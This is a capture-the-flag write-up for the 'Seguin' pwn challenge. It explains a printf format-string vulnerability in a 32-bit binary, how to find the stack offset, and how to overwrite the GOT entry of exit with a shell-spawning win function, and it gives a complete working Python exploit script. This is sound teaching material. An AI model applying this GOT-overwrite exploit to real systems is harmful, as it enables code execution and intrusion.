Writeup by edoardo3512 for Seguin

Binary

The given binary seguin is a 32-bit, dynamically linked executable that has not been stripped, so its symbols are still present.

$file seguin 
seguin: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, BuildID[sha1]=f845ef5d12dec4dc33f8be776208c5af5b1b52c4, for GNU/Linux 3.2.0, not stripped

$checksec seguin 
[*] '/media/edo/linux data/FCSC_hackropole/pwn - seguin/solve/seguin'
    Arch:       i386-32-little
    RELRO:      Partial RELRO
    Stack:      No canary found
    NX:         NX enabled
    PIE:        No PIE (0x8048000)
    Stripped:   No

We can see from checksec that the binary is not PIE, has only Partial RELRO, and has no stack canary. Not being PIE means the binary is always loaded at the same address (0x8048000), so we already know the position of every function at runtime without having to leak any data. Partial RELRO means that the addresses of the libc functions the binary calls are stored in the Global Offset Table (GOT) and resolved lazily, the first time each function is called. More importantly, the GOT stays writable for the whole execution, so its entries can be overwritten. Finally, the absence of a canary means that there is no protection against a buffer overflow that would overwrite the return address.

Running the binary doesn’t give us much information. It’s probably gonna be a simple buffer overflow with a return to a win function (spoiler: I was wrong), so let’s peek into the code with Ghidra.

$./seguin
************************************
** Service d'adoption des bovidés **
************************************
Merci d' indiquer le nom de l'animal que vous etes venus chercher :
>>> chevre
Vouz avez demandé chevre
Nous vous tiendrons au courant

Decompiling the program

First of all, hidden in the binary but hinted at by the challenge description, there is a win function. Our goal will be to take control of the flow of the program and call this function.

void chevre(void)

{
  system("/bin/sh");
  return;
}

The main function is quite simple. The program reads up to 31 bytes into a 32-byte buffer (fgets keeps one byte for the terminating null) and then prints them back. There is therefore no buffer overflow, but our input is printed by passing the buffer directly to printf instead of using puts or printf("%s", buffer). This is a terrible idea because any format specifier in our input will be interpreted by printf. We can use it to leak data with %p but, more importantly in our case, to write to memory with %n.

void main(void)

{
  char buffer [32];
  undefined *puStack_10;
  
  puStack_10 = &stack0x00000004;
  puts("************************************");
  puts(s_**_Service_d'adoption_des_bovid_s_0804a038);
  puts("************************************");
  printf("Merci d\' indiquer le nom de l\'animal que vous etes venus chercher :\n>>> ");
  fflush(_stdout);
  fgets(buffer,0x20,_stdin);
  printf(s_Vouz_avez_demand_0804a0a9);
  printf(buffer);
  puts("Nous vous tiendrons au courant");
                    /* WARNING: Subroutine does not return */
  exit(0);
}

The function doesn’t return and calls exit(0) instead, so overwriting the return address is not an option. So what can we overwrite to take control of the execution of the program?

The GOT! We can overwrite the address of a libc function with the address of our win function chevre, and the program will execute chevre instead of the intended function. For example, we can overwrite got.exit and the program will open a shell instead of shutting down.

Understanding printf

Let’s take a moment to remember how printf can be used to write data to memory. This is done through the specifier %n, which stores the number of characters printed so far into the int pointed to by the corresponding argument. For example, printf("Done!\n%nWhat is next?\n", &count) is equivalent to printf("%s", "Done!\n"); count = 6; printf("%s", "What is next?\n"). %n writes a full int, but you can also use %hn or %hhn if you only want to write a short or a single byte respectively, and we will see why this is so important.

If we can only write the number of characters printed so far and the buffer can only hold 32 bytes, it shouldn’t be possible to write any value we want, right? Wrong. Here comes the second specifier we will use: %c. It prints a single character, but you can also specify a field width, which pads the character with spaces. For example, printf("%2c", 0x41) will print " A", which counts as 2 characters, and printf("%1000c", 0x41) will print 1000 characters from a format string of only 6 bytes. This allows us to print an arbitrary number of characters and therefore get an [almost] arbitrary write through %n even if the input buffer has a limited size.
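Python's own % operator applies the same field-width rule to %c, so it can serve as a quick sanity check of the counts above. This is only an analogy: nothing here calls libc's printf, and the variable names are made up for the illustration.

```python
# Python's % formatting pads %c to the requested width just like C does,
# so it is a convenient (if approximate) stand-in for printf here.
two_wide = "%2c" % 0x41       # 'A' padded to a field of width 2
thousand = "%1000c" % 0x41    # a 6-character format expanding to 1000 characters

print(repr(two_wide))                  # ' A'
print(len("%1000c"), len(thousand))    # 6 1000
```

The number that matters for %n is the second one: the length of what has been printed, not the length of the format string.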

Finally, the last thing you need to know is that each specifier can also indicate which argument to use. For example, printf("%2$d %1$d", 1, 2) will print "2 1". But what happens when we write printf("%1000$p") without actually passing any argument?

Although the program is not “passing” any additional argument to printf, the function has no way of knowing that. When the format string asks for the 1000th argument, printf expects it to be on the stack, so it goes looking there and uses whatever it finds. Since our buffer in main is on the stack, and the stack frame of printf is placed on top of the one of main, we can access all the data we put in the buffer as if it had been passed to printf as arguments.

Writing the payload

The idea of our payload is to place a pointer to got.exit on the stack and then use %n to overwrite the function’s address with the address of chevre: 0x080491b2. Although in theory we could use %134517170c, having the server send 134MB of data is not amazing, so we will instead split the write into pieces. Ideally, the fastest option would be to write one byte at a time, because if we write the bytes in ascending order we would have to print no more than 256 characters in total. The only problem is that our input would have to be around 60 characters long. To fit in the 32 characters allowed, we will instead have to write two bytes at a time.
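To put numbers on that trade-off, here is a small sketch that compares how many characters printf has to emit for each write size. The helper total_output is a hypothetical name, and it assumes the chunks are written in ascending order with no wrap-around of the counter.

```python
# Compare how many characters printf must emit for each way of writing
# 0x080491b2 (the address of chevre quoted in the text).
TARGET = 0x080491B2

def total_output(value: int, chunk_bytes: int) -> int:
    """Characters printed when the chunks are written in ascending order.

    The %n counter only grows, so once the last (largest) chunk has been
    written the counter equals that largest chunk value.
    """
    mask = (1 << (8 * chunk_bytes)) - 1
    chunks = [(value >> (8 * chunk_bytes * i)) & mask for i in range(4 // chunk_bytes)]
    return max(chunks)

print(total_output(TARGET, 4))  # one %n write:     134517170
print(total_output(TARGET, 2))  # two %hn writes:   37298 (0x91b2)
print(total_output(TARGET, 1))  # four %hhn writes: 178 (0xb2)
```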

Why would we need 60 characters to overwrite the address one byte at a time?

To write a single byte, the format string would be roughly "%..c%..hhn", where the dots are digits we would have to calculate. That is already 10 characters. We then need 4 more bytes for the pointer to the specific byte we want to overwrite, and we have to repeat all of this for each of the 4 bytes of the address we are writing, so in total around 14*4 = 56 characters.

In conclusion, what we have to do is write 0x0804 at got.exit+2 and 0x91b2 at got.exit. We can do it with a string f"%{0x804}c%...$hn%{0x91b2-0x804}c%...$hn" padded to 24 characters (or fewer, as long as the length is still a multiple of 4 so that the pointers that follow stay aligned on the stack), followed by the two pointers, to got.exit+2 and got.exit.

The only thing we are missing now is the argument index at which printf will find our pointers.

Finding the offset

For this we want to locate where our buffer is on the stack as seen by printf. The simplest way to do it manually is to send a bunch of %p (or any other specifier that cannot crash when given an invalid argument, and whose output makes ASCII text easy to identify) and see where we start to read our own input.

$./seguin
************************************
** Service d'adoption des bovidés **
************************************
Merci d' indiquer le nom de l'animal que vous etes venus chercher :
>>> %p %p %p %p %p %p
Vouz avez demandé 0x20 0xf7021620 0x80491f4 0x25207025 0x70252070 0x20702520
Nous vous tiendrons au courant
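Reading a dump like this by eye works, but the search can also be scripted. The sketch below takes the leaked line and the input exactly as they appear in the session above; find_buffer_argument is a hypothetical helper, and it assumes 32-bit little-endian stack words.

```python
import struct

leak = "0x20 0xf7021620 0x80491f4 0x25207025 0x70252070 0x20702520"
sent = b"%p %p %p %p %p %p"

def find_buffer_argument(leak_line: str, sent_bytes: bytes) -> int:
    """Return the 1-based printf argument index where our input starts."""
    for index, word in enumerate(leak_line.split(), start=1):
        # glibc prints a null pointer as "(nil)" rather than 0x0.
        value = 0 if word == "(nil)" else int(word, 16)
        # Each %p shows one 32-bit stack word, stored little-endian in memory.
        if struct.pack("<I", value) == sent_bytes[:4]:
            return index
    raise ValueError("input not found in the leaked words")

print(find_buffer_argument(leak, sent))   # 4
```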

In this case we can count 3 values on the stack (0x20, 0xf7021620, and 0x80491f4) and then our buffer, starting with 0x25207025 == "%p %". The buffer therefore covers arguments 4 to 11. The only problem is that "%2052c%10$hn%35246c%11$hn" is 25 characters long, so we will have to place the pointers at the beginning of the buffer to be able to access them as arguments 4 and 5, removing 2 bytes from the string. This would have been the smart move from the start, since it also avoids having to worry about alignment, but I just don’t like it and prefer padding my string, mainly because now we have to account for the 8 bytes that printf will already have written and subtract them from the first width. The resulting string becomes "%2044c%5$hn%35246c%4$hn".
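For readers who want to check the arithmetic without a debugger, the payload can be rebuilt with the standard library alone. This is a sketch, not the exploit itself: the got.exit address 0x0804c020 is an assumption decoded from the payload bytes printed in the exploit output, build_payload is a hypothetical name, and the helper assumes the two halves differ and are both larger than the 8 bytes already printed.

```python
import struct

GOT_EXIT = 0x0804C020   # assumption: decoded from the payload printed by the exploit
CHEVRE = 0x080491B2     # address of chevre quoted in the text
FIRST_ARG = 4           # the buffer starts at printf argument 4

def build_payload(got_addr: int, target: int, first_arg: int) -> bytes:
    low, high = target & 0xFFFF, target >> 16
    # Pointers first: got_addr is argument first_arg, got_addr + 2 the next one.
    pointers = struct.pack("<II", got_addr, got_addr + 2)
    # Write the smaller half first, because the %n counter can only grow.
    writes = sorted([(low, first_arg), (high, first_arg + 1)])
    printed = len(pointers)     # the 8 pointer bytes are printed before any padding
    fmt = ""
    for value, arg in writes:
        fmt += f"%{value - printed}c%{arg}$hn"
        printed = value
    return pointers + fmt.encode()

payload = build_payload(GOT_EXIT, CHEVRE, FIRST_ARG)
print(payload)
print(len(payload))   # 31
```

The result is 31 bytes long, which is exactly the maximum that fgets(buffer, 0x20, stdin) will read.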

In case you make a mistake computing the offset (which of course I never did…) and printf crashes, or even worse just doesn’t write where you expect, don’t panic and remember that you can always change the %{n}$hn into a simple %{n}$p, which will print the pointer you are trying to write to. For example, in my case that’s how I realized that I had started counting the arguments from 0 instead of 1 and was trying to write to an invalid address. (Remember to disable ASLR if the addresses you care about are randomized, so that you can immediately recognise whether they are correct between multiple tests.)
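That substitution is easy to automate. A minimal sketch, assuming the payload only uses positional %N$n, %N$hn or %N$hhn writes; to_debug_payload is a hypothetical helper name.

```python
import re

def to_debug_payload(payload: bytes) -> bytes:
    """Turn every positional %N$n, %N$hn or %N$hhn into a harmless %N$p."""
    return re.sub(rb"(%\d+\$)h{0,2}n", rb"\1p", payload)

fmt = b"%2044c%5$hn%35246c%4$hn"
print(to_debug_payload(fmt))   # b'%2044c%5$p%35246c%4$p'
```

Sending the debug version prints the two values printf would have written through, so a wrong argument index shows up as something that is clearly not a GOT address.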

Exploit

#!/usr/bin/env python3
from gdb_plus import *

binary_name = "./seguin"
context.binary = binary_name

HOST = "127.0.0.1"
PORT = 4000


def log_exploit(self):
    log.info(f"got.exit before printf: {hex(self.read_int(self.symbols['got.exit']))}")
    self.ni()
    log.info(f"got.exit after  printf: {hex(self.read_int(self.symbols['got.exit']))}")
    return False


def main():
    dbg = Debugger(context.binary).remote(HOST, PORT)
    dbg.b(0x8049289, callback=log_exploit) # Put a breakpoint on printf(buffer) to make sure the exploit works
    dbg.c(wait=False)

    # We already know the addresses, but let's keep it parametric
    high_bytes = dbg.elf.symbols["chevre"] // 0x10000 # 0x0804
    low_bytes = dbg.elf.symbols["chevre"] % 0x10000 # 0x91b2
    payload = p32(dbg.elf.symbols["got.exit"]) + p32(dbg.elf.symbols["got.exit"] + 2)
    if high_bytes > low_bytes:
        payload += f"%{low_bytes-len(payload)}c%4$hn%{high_bytes-low_bytes}c%5$hn".encode()
    else:
        payload += f"%{high_bytes-len(payload)}c%5$hn%{low_bytes-high_bytes}c%4$hn".encode()
    print(payload)
    
    dbg.p.sendlineafter(b">>> ", payload)
    sleep(1) # Wait to receive all the data from printf
    dbg.p.clean() # and throw it all away before getting the flag
    dbg.p.sendline(b"cat flag.txt")
    flag = dbg.p.recvline().decode()
    log.success(f"FLAG: {flag}") # You won <3

if __name__ == "__main__":
    main()

Our exploit works both locally

$python3 solve.py NOPTRACE
[*] './seguin'
    Arch:       i386-32-little
    RELRO:      Partial RELRO
    Stack:      No canary found
    NX:         NX enabled
    PIE:        No PIE (0x8048000)
    Stripped:   No
[+] Starting local process './seguin': pid 19312
[!] Debug is off, commands won't be executed
b' \xc0\x04\x08"\xc0\x04\x08%2044c%5$hn%35246c%4$hn'
[+] FLAG: test_flag{solved}
[*] Stopped process './seguin' (pid 19312)

And remotely

$python3 solve.py REMOTE
[*] './seguin'
    Arch:       i386-32-little
    RELRO:      Partial RELRO
    Stack:      No canary found
    NX:         NX enabled
    PIE:        No PIE (0x8048000)
    Stripped:   No
[+] Opening connection to 127.0.0.1 on port 4000: Done
[!] Debug is off, commands won't be executed
b' \xc0\x04\x08"\xc0\x04\x08%2044c%5$hn%35246c%4$hn'
[+] FLAG: REDACTED
[*] Closed connection to 127.0.0.1 port 4000